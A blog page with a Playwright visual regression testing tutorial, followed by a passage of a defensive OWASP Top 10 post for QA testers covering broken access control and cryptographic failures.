by Rajesh K | May 8, 2025 | Automation Testing, Blog, Latest Post |

Playwright Visual Testing is an automated approach to verify that your web application’s UI looks correct and remains consistent after code changes. In modern web development, how your app looks is just as crucial as how it works. Visual bugs like broken layouts, overlapping elements, or wrong colors can slip through functional tests. This is where Playwright’s visual regression testing capabilities come into play. By using screenshot comparisons, Playwright helps catch unintended UI changes early in development, ensuring a pixel-perfect user experience across different browsers and devices. In this comprehensive guide, we’ll explain what Playwright visual testing is, why it’s important, and how to implement it. You’ll see examples of capturing screenshots and comparing them against baselines, learn about setting up visual tests in CI/CD pipelines, using thresholds to ignore minor differences, and performing cross-browser visual checks, and discover tools that enhance Playwright’s visual testing. Let’s dive in!

What is Playwright Visual Testing?

Playwright is an open-source end-to-end testing framework by Microsoft that supports multiple languages (JavaScript/TypeScript, Python, C#, Java) and all modern browsers. Playwright Visual Testing refers to using Playwright’s features to perform visual regression testing: automatically detecting changes in the appearance of your web application. In simpler terms, it means taking screenshots of web pages or elements and comparing them to previously stored baseline images (the expected appearance). If the new screenshot differs from the baseline beyond an acceptable threshold, the test fails, flagging a visual discrepancy.

Visual testing focuses on the user interface aspect of quality. Unlike functional testing which asks “does it work correctly?”, visual testing asks “does it look correct?”. This approach helps catch:

- Layout shifts or broken alignment of elements

- CSS styling issues (colors, fonts, sizes)

- Missing or overlapping components

- Responsive design problems on different screen sizes

By incorporating visual checks into your test suite, you ensure that code changes (or even browser updates) haven’t unintentionally altered the UI. Playwright’s Node.js test runner (@playwright/test) provides built-in assertions for capturing and comparing screenshots, so visual testing needs no third-party add-ons there (the Python, Java, and .NET bindings can capture screenshots but do not ship these comparison assertions). Next, we’ll explore why this form of testing is crucial for modern web apps.

Why Visual Testing Matters

Visual bugs can significantly impact user experience, yet they are easy to overlook if you’re only doing manual checks or writing traditional functional tests. Here are some key benefits and reasons why integrating visual regression testing with Playwright is important:

- Catch visual regressions early: Automated visual tests help you detect unintended design changes as soon as they happen. For example, if a CSS change accidentally shifts a button out of view, a visual test will catch it immediately before it reaches production.

- Ensure consistency across devices/browsers: Your web app should look and feel consistent on Chrome, Firefox, Safari, and across desktop and mobile. Playwright visual tests can run on all supported browsers and even emulate devices, validating that layouts and styles remain consistent everywhere.

- Save time and reduce human error: Manually checking every page after each release is tedious and error-prone. Automated visual testing is fast and repeatable – it can evaluate pages in seconds, flagging differences that a human eye might miss (especially subtle spacing or color changes). This speeds up release cycles.

- Increase confidence in refactoring: When developers refactor frontend code or update dependencies, there’s a risk of breaking the UI. Visual tests give a safety net – if something looks off, the tests will fail. This boosts confidence to make changes, knowing that visual regressions will be caught.

- Historical UI snapshots: Over time, you build a gallery of baseline images. These serve as a visual history of your application’s UI. They can provide insights into how design changes evolved and help decide if certain UI changes were beneficial or not.

- Complement functional testing: Visual testing fills the gap that unit or integration tests don’t cover. It ensures the application not only functions correctly but also appears correct. This holistic approach to testing improves overall quality.

In summary, Playwright Visual Testing matters because it guards the user experience. It empowers teams to deliver polished, consistent UIs with confidence, even as the codebase and styles change frequently.

How Visual Testing Works in Playwright

Now that we understand the what and why, let’s see how Playwright visual testing actually works. The process can be broken down into a few fundamental steps: capturing screenshots, creating baselines, comparing images, and handling results. Playwright’s test runner has snapshot testing built-in, so you can get started with minimal setup. Below, we’ll walk through each step with examples.

1. Capturing Screenshots in Tests

The first step is to capture a screenshot of your web page (or a specific element) during a test. Playwright makes this easy with its page.screenshot() method and assertions like expect(page).toHaveScreenshot(). You can take screenshots at key points, for example after the page loads or after performing actions that change the UI.

In a Playwright test, capturing and verifying a screenshot can be done in one line using the toHaveScreenshot assertion. Here’s a simple example:

// example.spec.js
const { test, expect } = require('@playwright/test');

test('homepage visual comparison', async ({ page }) => {
  await page.goto('https://example.com');
  await expect(page).toHaveScreenshot(); // captures and compares screenshot
});

In this test, Playwright navigates to the page and then takes a screenshot of the viewport. On the first run, since no baseline exists yet, Playwright saves the screenshot as the baseline image (more on baselines in a moment) and reports the test as failed so the newly written baseline doesn’t go unnoticed. In subsequent runs, it takes a new screenshot and automatically compares it against the saved baseline.

How it works: The expect(page).toHaveScreenshot() assertion is part of Playwright’s test library. Under the hood, it captures the image and then looks for a matching reference image. By default, the baseline image is stored in a folder (next to your test file) with a generated name based on the test title. You can also specify a name or path for the screenshot if needed. Playwright can capture the full page or just the visible viewport; by default it captures the viewport, but you can pass options to toHaveScreenshot or page.screenshot() (like { fullPage: true }) if you want a full-page image.

2. Creating Baseline Images (First Run)

A baseline image (also called a golden image) is the expected appearance of your application’s UI. The first time you run a visual test, you need to establish these baselines. When toHaveScreenshot (or toMatchSnapshot for images) finds no baseline, Playwright’s default behavior is to write the captured image as the new baseline and fail the test with a message that the snapshot didn’t exist; running with the update flag writes the baseline and lets the test pass.

Typically, you’ll run Playwright tests with a special flag to update snapshots on the first run. For example:

npx playwright test --update-snapshots

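Running with --update-snapshots tells Playwright to treat the current screenshots as the correct baseline. It saves the screenshot files in a snapshots folder next to the test (for example, tests/example.spec.js-snapshots/ if your test file is example.spec.js). By default the file name is derived from the test title, with the browser project name and platform appended, so the test above would produce something like homepage-visual-comparison-1-chromium-linux.png. These baseline images should be checked into version control so that your team and CI system all use the same references.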

After creating the baselines, future test runs (without the update flag) will compare new screenshots against these saved images. It’s a good practice to review the baseline images to ensure they truly represent the intended design of your application.
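To make the naming rule concrete, here is a simplified sketch of how Playwright’s default snapshot path template, {snapshotDir}/{testFileDir}/{testFileName}-snapshots/{arg}{-projectName}{-snapshotSuffix}{ext}, expands into a file path. The snapshotPath helper is hypothetical and skips details such as file-name sanitization; it assumes snapshotDir is the test directory and snapshotSuffix is the operating-system platform, which are Playwright’s defaults.

```javascript
const path = require('node:path');

// Hypothetical helper: a simplified model of Playwright's default snapshot path template
//   {snapshotDir}/{testFileDir}/{testFileName}-snapshots/{arg}{-projectName}{-snapshotSuffix}{ext}
// A token written as {-token} contributes "-value" only when the value is non-empty.
function snapshotPath({
  snapshotDir,
  testFileDir = '',
  testFileName,
  arg,
  projectName = '',
  snapshotSuffix = process.platform,
  ext = '.png',
}) {
  const optional = (value) => (value ? `-${value}` : '');
  const fileName = `${arg}${optional(projectName)}${optional(snapshotSuffix)}${ext}`;
  // posix.join keeps forward slashes and ignores the empty testFileDir segment
  return path.posix.join(snapshotDir, testFileDir, `${testFileName}-snapshots`, fileName);
}

// Baseline for toHaveScreenshot('homepage.png') in tests/example.spec.js,
// run by a project named "chromium" on Linux:
console.log(snapshotPath({
  snapshotDir: 'tests',
  testFileName: 'example.spec.js',
  arg: 'homepage',
  projectName: 'chromium',
  snapshotSuffix: 'linux',
}));
// tests/example.spec.js-snapshots/homepage-chromium-linux.png
```

If your team needs a different layout, Playwright lets you override the template with the snapshotPathTemplate option in the config.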

3. Pixel-by-Pixel Comparison of Screenshots

Once baselines are in place, Playwright’s test runner will automatically compare new screenshots to the baseline images each time the test runs. This is done pixel-by-pixel to catch any differences. If the new screenshot exactly matches the baseline, the visual test passes. If there are any pixel differences beyond the allowed threshold, the test fails, indicating a visual regression.

Under the hood, Playwright uses an image comparison algorithm (powered by the Pixelmatch library) to detect differences between images. Pixelmatch will compare the two images and identify any pixels that changed (e.g., due to layout shift, color change, etc.). It can also produce a diff image that highlights changed pixels in a contrasting color (often bright red or magenta), making it easy for developers to spot what’s different.
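The core idea of a pixel-by-pixel comparison can be sketched in a few lines of plain JavaScript. This is a deliberately simplified stand-in, not pixelmatch: the diffImages function below is hypothetical and counts every pixel whose RGBA bytes differ at all, whereas pixelmatch applies a perceptual color threshold and can ignore anti-aliased pixels.

```javascript
// Simplified illustration of a pixel-by-pixel comparison on raw RGBA buffers
// (4 bytes per pixel). NOT pixelmatch's algorithm: any byte difference counts.
function diffImages(expected, actual, width, height) {
  const size = width * height * 4;
  if (expected.length !== size || actual.length !== size) {
    throw new Error('Images must have identical dimensions');
  }
  const diff = new Uint8ClampedArray(size); // diff image, fully transparent to start
  let diffPixels = 0;
  for (let i = 0; i < size; i += 4) {
    const changed =
      expected[i] !== actual[i] ||
      expected[i + 1] !== actual[i + 1] ||
      expected[i + 2] !== actual[i + 2] ||
      expected[i + 3] !== actual[i + 3];
    if (changed) {
      diffPixels += 1;
      diff[i] = 255;     // paint the changed pixel opaque red in the diff image
      diff[i + 3] = 255;
    }
  }
  return { diffPixels, diff };
}

// Two 2x2 images that differ only in the red channel of the second pixel.
const baseline = new Uint8ClampedArray(2 * 2 * 4);
const current = Uint8ClampedArray.from(baseline);
current[4] = 10;
console.log(diffImages(baseline, current, 2, 2).diffPixels); // 1
```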

What happens on a difference? If a visual mismatch is found, Playwright marks the test as failed. The test output reports how many pixels differed and what ratio of the image that represents. Playwright also writes the expected, actual, and diff images to the test output folder (test-results/ by default), for example homepage-expected.png, homepage-actual.png (new screenshot), and homepage-diff.png (the visual difference overlay), while the baseline itself stays in the snapshots folder. By inspecting these images, you can pinpoint the UI changes. This immediate visual feedback is extremely helpful for debugging: just open the images to see what changed.

4. Setting Thresholds for Acceptable Differences

Sometimes, tiny pixel differences can occur that are not true bugs. For instance, anti-aliasing differences between operating systems, minor font rendering changes, or a 1-pixel shift might not be worth failing the test. Playwright allows you to define thresholds or tolerances for image comparisons to avoid false positives.

You can configure a threshold as an option to the toHaveScreenshot assertion (or in your Playwright config). For example, you might allow a small percentage of pixels to differ:

await expect(page).toHaveScreenshot({ maxDiffPixelRatio: 0.001 });

The above would pass the test even if up to 0.1% of pixels differ. Alternatively, you can set an absolute pixel count tolerance with maxDiffPixels, or a per-pixel color tolerance with threshold, a value between 0 (strict) and 1 (lax) that defaults to 0.2 and decides how different two pixels must be before they count as changed. For instance:

await expect(page).toHaveScreenshot({ maxDiffPixels: 100 }); // ignore up to 100 pixels
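To see how these options turn into a pass or fail, the sketch below models the decision in plain JavaScript. The helper names are hypothetical, and the rule it encodes is an assumption based on current Playwright behavior: the limit is the smaller of maxDiffPixels and maxDiffPixelRatio times the image area when both are set, and zero when neither is. The per-pixel threshold option, which decides which pixels count as different in the first place, is not modeled.

```javascript
// Simplified model of how the tolerance options combine (assumed behavior):
// the stricter limit wins when both are set; with neither, no differing pixels are allowed.
function allowedDiffPixels(width, height, { maxDiffPixels, maxDiffPixelRatio } = {}) {
  const fromRatio =
    maxDiffPixelRatio !== undefined ? width * height * maxDiffPixelRatio : undefined;
  if (maxDiffPixels !== undefined && fromRatio !== undefined) {
    return Math.min(maxDiffPixels, fromRatio);
  }
  return maxDiffPixels ?? fromRatio ?? 0;
}

function screenshotPasses(diffPixels, width, height, options) {
  return diffPixels <= allowedDiffPixels(width, height, options);
}

// Playwright's default viewport is 1280x720 = 921,600 pixels, so
// maxDiffPixelRatio: 0.001 tolerates roughly 921 differing pixels.
console.log(screenshotPasses(900, 1280, 720, { maxDiffPixelRatio: 0.001 }));  // true
console.log(screenshotPasses(1000, 1280, 720, { maxDiffPixelRatio: 0.001 })); // false
console.log(screenshotPasses(150, 1280, 720, { maxDiffPixels: 100, maxDiffPixelRatio: 0.001 })); // false
```

Note that a ratio scales with the screenshot size, so the same maxDiffPixelRatio allows many more pixels on a full-page capture than on a viewport capture.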

These settings let you fine-tune the sensitivity of visual tests. It’s important to strike a balance: you want to catch real regressions, but not fail the build over insignificant rendering variations. Often, teams start with a small tolerance to account for environment differences. You can define these thresholds globally in the Playwright configuration so they apply to all tests for consistency.

5. Automation in CI/CD Pipelines

One of the strengths of using Playwright for visual testing is that it integrates smoothly into continuous integration (CI) workflows. You can run your Playwright visual tests on your CI server (Jenkins, GitHub Actions, GitLab CI, etc.) as part of every build or deployment. This way, any visual regression will automatically fail the pipeline, preventing unintentional UI changes from going live.

In a CI setup, you’ll typically do the following:

- Check in baseline images: Ensure the baseline snapshot folder is part of your repository, so the CI environment has the expected images to compare against.

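- Run tests on a consistent environment: To avoid false differences, run the browser in a consistent environment (same resolution, headless mode, same browser version). Each Playwright release pins specific browser builds, but fonts and text rendering still vary between operating systems, so generate baselines on the same OS that CI uses (for example, inside Playwright’s official Docker image).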

- Update baselines intentionally: When a deliberate UI change is made (for example, a redesign of a component), the visual test will fail because the new screenshot doesn’t match the old baseline. At that point, a team member can review the changes and, if they are expected, re-run the tests with --update-snapshots to update the baseline images to the new look. The updated baselines can be committed together with the UI change or through a separate, reviewed process.

- Review diffs in pull requests: Visual changes will show up as diffs (image files) in code review. This provides an opportunity for designers or developers to verify that changes are intentional and acceptable.

By automating visual tests in CI/CD, teams get immediate feedback on UI changes. It enforces an additional quality gate: code isn’t merged unless the application looks right. This dramatically reduces the chances of deploying a UI bug to production. It also saves manual QA effort on visual checking.

6. Cross-Browser and Responsive Visual Testing

Web applications need to look correct on various browsers and devices. A big advantage of Playwright is its built-in support for testing in Chromium (Chrome/Edge), WebKit (Safari), and Firefox, as well as the ability to simulate mobile devices. You should leverage this to do visual regression testing across different environments.

With Playwright, you can specify multiple projects or launch contexts in different browser engines. For example, you can run the same visual test in Chrome and Firefox. Each will produce its own set of baseline images, because by default Playwright appends the project name to every snapshot file name. This ensures that a change that affects only a specific browser’s rendering (say, CSS that behaves differently in Firefox) will be caught.

Similarly, you can test responsive layouts by setting the viewport size or emulating a device. For instance, you might have one test run for desktop dimensions and another for a mobile viewport. Playwright can mimic devices like an iPhone or Pixel phone using device descriptors. The screenshots from those runs will validate the mobile UI against mobile baselines.

Tip: When doing cross-browser visual testing, be mindful that different browsers might have slight default rendering differences (like font smoothing). You might need to use slightly higher thresholds or per-browser baseline images. In many cases, if your UI is well-standardized, the snapshots will match closely. Ensuring consistent CSS resets and using web-safe fonts can help minimize differences across browsers.

7. Debugging and Results Reporting

When a visual test fails, Playwright provides useful output to debug the issue. In the terminal, the test failure message will indicate that the screenshot comparison did not match the expected snapshot. It often mentions how many pixels differed or the percentage difference. More importantly, Playwright saves the images for inspection. By default you’ll get:

- The baseline image (what the UI was expected to look like)

- The actual image from the test run (how the UI looks now)

- A diff image highlighting the differences

You can open these images side by side to immediately spot the regression. If you use Playwright’s HTML reporter (open it locally with npx playwright show-report), the expected, actual, and diff images appear directly in the report for each failed comparison.

Because visual differences are easier to understand visually than through logs, debugging usually just means reviewing the images. Once you identify the cause (e.g. a missing CSS file, or an element that moved), you can fix the issue (or approve the change if it was intentional). Then update the baseline if needed and re-run tests.

Playwright’s logs will also show the test step where the screenshot was taken, which can help correlate which part of your application or which recent commit introduced the change.

Tools and Integrations for Visual Testing

While Playwright has robust built-in visual comparison capabilities, there are additional tools and integrations that can enhance your visual testing workflow:

- Percy – Visual review platform: Percy (now part of BrowserStack) is a popular cloud service for visual testing. You can integrate Percy with Playwright by capturing snapshots in your tests and sending them to Percy’s service. Percy provides a web dashboard where team members can review visual diffs side-by-side, comment on them, and approve or reject changes. It also handles cross-browser rendering in the cloud. This is useful for teams that want a collaborative approval process for UI changes beyond the command-line output. (Playwright + Percy can be achieved via Percy’s SDK or CLI tools that work with any web automation).

- Applitools Eyes – AI-powered visual testing: Applitools is another platform that specializes in visual regression testing and uses AI to detect differences in a smarter way (ignoring certain dynamic content, handling anti-aliasing, etc.). Applitools has an SDK that can be used with Playwright. In your tests, you open Applitools Eyes and capture checkpoints; Eyes uploads them to the Applitools service, where its Ultrafast Grid can render and compare them across multiple browsers and screen sizes. The results are viewed on the Applitools dashboard, with differences highlighted. This tool is known for features like intelligent region ignoring and visual AI assertions.

- Pixelmatch – Image comparison library: Pixelmatch is the open-source library that Playwright uses under the hood for comparing images. If you want to perform custom image comparisons or generate diff images yourself, you could use Pixelmatch in a Node script. However, in most cases you won’t need to interact with it directly since Playwright’s expect assertions already leverage it.

- jest-image-snapshot – Jest integration: Before Playwright had built-in screenshot assertions, a common approach was to use Jest with the jest-image-snapshot library. This library also uses Pixelmatch and provides a nice API to compare images in tests. If you are using Playwright through Jest (instead of Playwright’s own test runner), you can use expect(image).toMatchImageSnapshot(). However, if you use @playwright/test, it has its own toMatchSnapshot and toHaveScreenshot assertions for images, which follow the same baseline-and-diff approach.

- CI Integrations – GitHub Actions and others: There are community actions and templates to run Playwright visual tests on CI and upload artifacts (like diff images) for easier viewing. For instance, you could configure your CI to comment on a pull request with a link to the diff images when a visual test fails. Some cloud providers (like BrowserStack, LambdaTest) also offer integrations to run Playwright tests on their infrastructure and manage baseline images.

Using these tools is optional but can streamline large-scale visual testing, especially for teams with many baseline images or the need for cross-team collaboration on UI changes. If you’re just starting out, Playwright’s built-in capabilities might be enough. As your project grows, you can consider adding a service like Percy or Applitools for a more managed approach.

Code Example: Visual Testing in Action

To solidify the concepts, let’s look at a slightly more involved code example using Playwright’s snapshot testing. In this example, we will navigate to a page, wait for an element, take a screenshot, and compare it to a baseline image:

// visual.spec.js
const { test, expect } = require('@playwright/test');

test('Playwright homepage visual test', async ({ page }) => {
  // Navigate to the Playwright homepage
  await page.goto('https://playwright.dev/');

  // Wait for a stable element so the page finishes loading
  await page.waitForSelector('header >> text=Playwright');

  // Capture and compare a full-page screenshot.
  // toHaveScreenshot(name, options): the snapshot name is the first argument, not an option.
  // • The first run (with --update-snapshots) saves the baseline
  // • Subsequent runs compare against that baseline
  await expect(page).toHaveScreenshot('playwright-home.png', { fullPage: true });
});

Expected output

| Run | What happens | Files created |
| --- | --- | --- |
| First run (with --update-snapshots) | Screenshot is treated as the baseline. Test passes. | tests/visual.spec.js-snapshots/playwright-home-chromium-linux.png (by default Playwright appends the project name and platform; shown here for a project named chromium on Linux) |
| Later runs | Playwright captures a new screenshot and compares it to the baseline. | If identical: test passes, no new files. If different: test fails and Playwright writes playwright-home-expected.png, playwright-home-actual.png (current), and playwright-home-diff.png (changes) to the test-results/ folder. |

Conclusion:

Playwright visual testing is a powerful technique to ensure your web application’s UI remains consistent and bug-free through changes. By automating screenshot comparisons, you can catch CSS bugs, layout breaks, and visual inconsistencies that might slip past regular tests. We covered how Playwright captures screenshots and compares them to baselines, how you can integrate these tests into your development workflow and CI/CD, and even extend the capability with tools like Percy or Applitools for advanced use cases.

The best way to appreciate the benefits of visual regression testing is to try it out in your own project. Set up Playwright’s test runner, write a couple of visual tests for key pages or components, and run them whenever you make UI changes. You’ll quickly gain confidence that your application looks exactly as intended on every commit. Pixel-perfect interfaces and happy users are within reach!

Frequently Asked Questions

How do I do visual testing in Playwright?

Playwright has built-in support for visual testing through its screenshot assertions. To do visual testing, you write a test that navigates to a page (or renders a component), then use expect(page).toHaveScreenshot() or take a page.screenshot() and use expect().toMatchSnapshot() to compare it against a baseline image. On the first run you create baseline snapshots (using --update-snapshots), and on subsequent runs Playwright will automatically compare and fail the test if the UI has changed. Essentially, you let Playwright capture images of your UI and catch any differences as test failures.

Can Playwright be used with Percy or Applitools for visual testing?

Yes. Playwright can integrate with third-party visual testing services like Percy and Applitools Eyes. For Percy, you can use their SDK or CLI to snapshot pages during your Playwright tests and upload them to Percy’s service, where you get a nice UI to review visual diffs and manage baseline approvals. For Applitools, you can use the Applitools Eyes SDK for Playwright: you replace or supplement Playwright’s built-in comparison with Eyes calls (such as eyes.open() and eyes.check()) in your test. These services run comparisons in the cloud and often provide cross-browser screenshots and AI-based difference detection, which can complement Playwright’s local pixel-to-pixel checks.

How do I update baseline snapshots in Playwright?

To update the baseline images (snapshots) in Playwright, rerun your tests with the update flag. For example: npx playwright test --update-snapshots. This will take new screenshots for any failing comparisons and save them as the new baselines. You should do this only after verifying that the visual changes are expected and correct (for instance, after an intentional UI update or fixing a bug). It’s wise to review the diff images or run the tests locally before updating snapshots in your main branch. Once updated, commit the new snapshot images so that future test runs use them.

How can I ignore minor rendering differences in visual tests?

Minor differences (like a 1px shift or slight font anti-aliasing change) can be ignored by setting a tolerance threshold. Playwright’s toHaveScreenshot allows options such as maxDiffPixels or maxDiffPixelRatio to define how much difference is acceptable. For example, expect(page).toHaveScreenshot({ maxDiffPixels: 50 }) would ignore up to 50 differing pixels. You can also adjust threshold for color sensitivity. Another strategy is to apply a consistent CSS (or hide dynamic elements) during screenshot capture – for instance, hide an ad banner or timestamp that changes on every load by injecting CSS before taking the screenshot. This ensures those dynamic parts don’t cause false diffs.

Does Playwright Visual Testing support comparing specific elements or only full pages?

You can compare specific elements as well. Playwright’s toHaveScreenshot can be used on a locator (a Locator object) in addition to the full page. For example: await expect(page.locator('.header')).toHaveScreenshot(); will capture a screenshot of just the element matching .header and compare it. This is useful if you want to isolate a particular component’s appearance. You can also manually do const elementShot = await element.screenshot() and then expect(elementShot).toMatchSnapshot('element.png'). So, Playwright supports both full-page and element-level visual comparisons.

by Rajesh K | May 6, 2025 | Security Testing, Blog, Featured, Latest Post |

Web applications are now at the core of business operations, from e-commerce and banking to healthcare and SaaS platforms. As industries increasingly rely on web apps to deliver value and engage users, the security stakes have never been higher. Cyberattacks targeting these applications are on the rise, often exploiting well-known and preventable vulnerabilities. The consequences can be devastating: massive data breaches, system compromises, and reputational damage that can cripple even the most established organizations. Understanding these vulnerabilities is crucial, and this is where security testing plays a critical role. These risks, especially those highlighted in the OWASP Top 10 Vulnerabilities list, represent the most critical and widespread threats in the modern threat landscape. Testers play a vital role in identifying and mitigating them. By learning how these vulnerabilities work and how to test for them effectively, QA professionals can help ensure that applications are secure before they reach production, protecting both users and the organization.

In this blog, we’ll explore each of the OWASP Top 10 vulnerabilities and how QA testers can be proactive in identifying and addressing these risks to improve the overall security of web applications.

OWASP Top 10 Vulnerabilities:

Broken Access Control

What is Broken Access Control?

Broken access control occurs when a web application fails to enforce proper restrictions on what authenticated users can do. This vulnerability allows attackers to access unauthorised data or perform restricted actions, such as viewing another user’s sensitive information, modifying data, or accessing admin-only functionalities.

Common Causes

- Lack of a “Deny by Default” Policy: Systems that don’t explicitly restrict access unless specified allow unintended access.

- Insecure Direct Object References (IDOR): Attackers manipulate identifiers (e.g., user IDs in URLs) to access others’ data.

- URL Tampering: Users alter URL parameters to bypass restrictions.

- Missing API Access Controls: APIs (e.g., POST, PUT, DELETE methods) lack proper authorization checks.

- Privilege Escalation: Users gain higher permissions, such as acting as administrators.

- CORS Misconfiguration: Incorrect Cross-Origin Resource Sharing settings expose APIs to untrusted domains.

- Forced Browsing: Attackers access restricted pages by directly entering URLs.

Real‑World Exploit Example – Unauthorized Account Switch

- Scenario: A multi‑tenant SaaS platform exposes a “View Profile” link: https://app.example.com/profile?user_id=326. By simply changing 326 to 327, an attacker views another customer’s billing address and purchase history: an Insecure Direct Object Reference (IDOR). The attacker iterates IDs, harvesting thousands of records in under an hour.

- Impact: PCI data is leaked, triggering GDPR fines and mandatory breach disclosure; churn spikes 6 % in the following quarter.

- Lesson: Every request must enforce server‑side permission checks; adopt randomized, non‑guessable IDs or UUIDs and automated penetration tests that iterate parameters.
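On the server side, the fix for this scenario is an ownership check that runs on every request and denies by default. The sketch below is hypothetical: the roles, permission names, and in-memory store stand in for whatever your application uses, and in a real app the user would come from the authenticated session, never from the URL.

```javascript
// Sketch of a server-side, deny-by-default ownership check for a lookup like
// /profile?user_id=327. Roles, permission names, and the store are hypothetical.
const ROLE_PERMISSIONS = new Map([
  ['customer', new Set(['profile:read:own'])],
  ['support', new Set(['profile:read:any'])],
]);

const profiles = new Map([
  ['326', { ownerId: '326', billingAddress: '1 Example Road' }],
  ['327', { ownerId: '327', billingAddress: '2 Example Road' }],
]);

function isAllowed(user, action, resource) {
  const perms = ROLE_PERMISSIONS.get(user?.role) ?? new Set(); // unknown role: no rights
  if (perms.has(`${action}:any`)) return true;
  if (perms.has(`${action}:own`)) return resource.ownerId === user.id;
  return false; // deny by default
}

function getProfile(user, requestedId) {
  const profile = profiles.get(String(requestedId));
  // Answer "not found" for both missing and foreign records so that
  // iterating IDs does not reveal which ones exist.
  if (!profile || !isAllowed(user, 'profile:read', profile)) {
    return { status: 404 };
  }
  return { status: 200, body: profile };
}

// The attack from the scenario: customer 326 edits the ID to 327.
console.log(getProfile({ id: '326', role: 'customer' }, 327).status); // 404
```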

QA Testing Focus – Verify Every Path to Every Resource

- Attempt horizontal and vertical privilege jumps with multiple roles.

- Use OWASP ZAP or Burp Suite repeater to tamper with IDs, cookies, and headers.

- Confirm “deny‑by‑default” is enforced in automated integration tests.

Prevention Strategies

- Implement “Deny by Default”: Restrict access to all resources unless explicitly allowed.

- Centralize Access Control: Use a single, reusable access control mechanism across the application.

- Enforce Ownership Rules: Ensure users can only access their own data.

- Configure CORS Properly: Limit API access to trusted origins.

- Hide Sensitive Files: Prevent public access to backups, metadata, or configuration files (e.g., .git).

- Log and Alert: Monitor access control failures and notify administrators of suspicious activity.

- Rate Limit APIs: Prevent brute-force attempts to exploit access controls.

- Invalidate Sessions: Ensure session IDs are destroyed after logout.

- Use Short-Lived JWTs: For stateless authentication, limit token validity periods.

- Test Regularly: Create unit and integration tests to verify access controls.
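Several of these strategies are small pieces of logic. As one example, a minimal fixed-window rate limiter for the “Rate Limit APIs” point might look like this; createRateLimiter is a hypothetical helper, not a library API, and a production deployment would typically keep counters in a shared store so limits hold across servers.

```javascript
// Minimal fixed-window rate limiter sketch: at most `limit` requests per key
// (for example, user ID or client IP) in each `windowMs` window.
// In-memory and single-process; the clock is injectable so the logic can be tested.
function createRateLimiter({ limit, windowMs, now = Date.now }) {
  const windows = new Map(); // key -> { start, count }
  return function allow(key) {
    const t = now();
    const current = windows.get(key);
    if (!current || t - current.start >= windowMs) {
      windows.set(key, { start: t, count: 1 }); // first request in a new window
      return true;
    }
    if (current.count < limit) {
      current.count += 1;
      return true;
    }
    return false; // over the limit: respond with HTTP 429 Too Many Requests
  };
}
```

Usage: create one limiter per protected route, for example createRateLimiter({ limit: 5, windowMs: 60000 }) for a login endpoint, and call allow(userIdOrIp) before doing any work.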

Cryptographic Failures

What are Cryptographic Failures?

Cryptographic failures occur when sensitive data is not adequately protected due to missing, weak, or improperly implemented encryption. This exposes data like passwords, credit card numbers, or health records to attackers.

Common Causes

- Plain Text Transmission: Sending sensitive data over HTTP instead of HTTPS.

- Outdated Algorithms: Using weak or deprecated algorithms and protocols such as MD5, SHA-1, or TLS 1.0/1.1.

- Hard-Coded Secrets: Storing keys or passwords in source code.

- Weak Certificate Validation: Failing to verify server certificates, enabling man-in-the-middle attacks.

- Poor Randomness: Using low-entropy random number generators for encryption.

- Weak Password Hashing: Storing passwords with fast, unsalted hashes like SHA-256.

- Leaking Error Messages: Exposing cryptographic details in error responses.

- Database-Only Encryption: Relying solely on database encryption that transparently decrypts data for any query, which offers no protection once an attacker can run queries through injection.

Real‑World Exploit Example – Wi‑Fi Sniffing Exposes Logins

- Scenario: A booking site still serves its login page over http:// for legacy browsers. On airport Wi‑Fi, an attacker runs Wireshark, captures plaintext credentials, and later logs in as the CFO.

- Impact: Travel budget data and stored credit‑card tokens are exfiltrated; attackers launch spear‑phishing emails using real itineraries.

- Lesson: Enforce HSTS, redirect all HTTP traffic to HTTPS, enable Perfect Forward Secrecy, and pin certificates in the mobile app.
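The first two steps of that lesson can be sketched with Node’s built-in http module: the plain-HTTP listener does nothing but redirect, and HTTPS responses carry the HSTS header. CANONICAL_HOST and the one-year max-age are assumptions chosen for illustration; forward secrecy and certificate pinning are configured in the TLS setup and the mobile app, and are not shown.

```javascript
const http = require('node:http');

// CANONICAL_HOST is a hypothetical value. Redirecting to a fixed host, rather than
// echoing the request's Host header, avoids an open-redirect style bug.
const CANONICAL_HOST = 'app.example.com';
const HSTS = 'max-age=31536000; includeSubDomains'; // remember HTTPS-only for one year

// Handler for the plain-HTTP listener: never serve content, only redirect.
function redirectToHttps(req, res) {
  const target = typeof req.url === 'string' && req.url.startsWith('/') ? req.url : '/';
  res.writeHead(301, { Location: `https://${CANONICAL_HOST}${target}` });
  res.end();
}

// Browsers ignore Strict-Transport-Security received over plain HTTP,
// so call this on responses from the HTTPS server.
function addHsts(res) {
  res.setHeader('Strict-Transport-Security', HSTS);
}

// Created but not started here; in a deployment you would call redirectServer.listen(80).
const redirectServer = http.createServer(redirectToHttps);
```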

QA Testing Focus – Inspect the Crypto Posture

- Run SSL Labs to flag deprecated ciphers and protocols.

- Confirm secrets aren’t hard‑coded in repos.

- Validate that password hashes use Argon2 or bcrypt with unique salts.
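To know what a correctly salted hash looks like, it helps to see one produced. The sketch below uses scrypt from Node’s built-in crypto module rather than Argon2 or bcrypt, because those two require third-party packages; the hashPassword and verifyPassword helpers and the salt:hash storage format are assumptions for illustration.

```javascript
const crypto = require('node:crypto');

// Sketch: salted password hashing with scrypt (built into Node).
// Cost parameters are Node's defaults (N=16384, r=8, p=1); tune them for your hardware.
const KEY_LENGTH = 64;

function hashPassword(password) {
  const salt = crypto.randomBytes(16); // fresh random salt for every password
  const derived = crypto.scryptSync(password, salt, KEY_LENGTH);
  return `${salt.toString('hex')}:${derived.toString('hex')}`;
}

function verifyPassword(password, stored) {
  const [saltHex, hashHex] = stored.split(':');
  const expected = Buffer.from(hashHex, 'hex');
  const actual = crypto.scryptSync(password, Buffer.from(saltHex, 'hex'), expected.length);
  return crypto.timingSafeEqual(actual, expected); // constant-time comparison
}

// The same password hashed twice gives different stored values,
// which is what a tester should see when salts are unique.
const first = hashPassword('correct horse');
const second = hashPassword('correct horse');
console.log(first !== second);                       // true
console.log(verifyPassword('correct horse', first)); // true
console.log(verifyPassword('wrong guess', first));   // false
```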

Prevention Strategies

- Use HTTPS with TLS 1.3: Ensure all data is encrypted in transit.

- Adopt Strong Algorithms: Use AES for encryption and bcrypt, Argon2, or scrypt for password hashing.

- Avoid Hard-Coding Secrets: Store keys in secure vaults or environment variables.

- Validate Certificates: Enforce strict certificate checks to prevent man-in-the-middle attacks.

- Use Secure Randomness: Employ cryptographically secure random number generators.

- Implement Authenticated Encryption: Combine encryption with integrity checks to detect tampering.

- Remove Unnecessary Data: Minimize sensitive data storage to reduce risk.

- Set Security Headers: Use HTTP Strict-Transport-Security (HSTS) to enforce HTTPS.

